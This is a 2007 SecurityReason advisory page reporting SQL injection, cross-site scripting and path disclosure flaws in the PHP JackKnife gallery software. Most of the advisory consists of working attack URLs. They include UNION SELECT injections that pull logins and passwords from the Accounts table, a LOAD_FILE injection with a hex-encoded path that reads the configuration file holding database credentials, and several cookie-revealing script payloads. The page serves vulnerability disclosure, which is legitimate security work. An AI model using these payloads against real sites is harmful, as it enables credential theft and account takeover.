|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 2768 CVE : CVE-2007-3002 CVE : CVE-2007-3001 CVE : CVE-2007-3000 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : laurent gaffie Published : 07.06.2007
Advisory Text : Vendor site: http://www.phpjk.com/ Product: phpjackknife Bug: sql injection , xss , full path Risk: high Note: works regarless of php.ini settings Description: PHP JackKnife (PHPJK) is freely downloadable PHP gallery software that you can use to instantly create you own online web gallery Injection sql GET : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/ **/1,2,Password,4,5,6/**/from/**/Accounts/* http://127.0.0.1/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID= -1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/* Read database credentials: http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/ **/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5 048504A4B2F436F6E66696775726174696F6E732F5048504A4B5F436F6E6669672E70687 0),4,5,6/**/from/**/Accounts/* //Result (in the page source code) : $sUseDB = "MYSQL"; $sDatabaseName = "phpjk"; $sDatabaseServer = "localhost"; $sDatabaseLogin = "my_user"; $sDatabasePassword = "my_password"; ps:( 0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php ) Xss get : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=</textarea>'"><script> alert(document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?iDBLoc=</textarea>'"><script>alert( document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?iTtlNumItems=</textarea>'"><script> alert(document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?&iNumPerPage=</textarea>'"><script> alert(document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?sSort=</textarea>'"><script>alert(d ocument.cookie)</script> http://127.0.0.1/PHPJK/UserArea/Authenticate.php?sUName=</textarea>'"><s cript>alert(document.cookie)</script> http://127.0.0.1/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=</text area>'"><script>alert(document.cookie)</script> Full path : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1 http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0 regards laurent gaffie contact: laurent.gaffie (at) gmail (dot) com [email concealed] Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |